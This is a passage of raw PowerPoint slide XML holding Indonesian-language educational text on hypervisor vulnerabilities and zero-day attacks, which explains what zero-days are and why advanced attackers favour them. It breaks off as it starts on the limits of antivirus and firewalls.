              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tervirtualisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>halnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun, hypervisor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teratur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Zero-Day</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zero-day </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyadari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesempatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperbaikinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Istilah "zero-day" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menandakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperbaiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meluas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> patch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zero-day </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membahayakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencuri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meluncurkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lanjut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bentuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zero-day yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersembunyi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diprediksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disukai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lanjut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelompok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kejahatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terorganisir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> negara-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bangsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditargetkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bernilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lembaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemerintah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Karena </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah-langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tradisional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> antivirus dan firewall, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengandalkan</a:t>
            </a:r>
            <a:r>
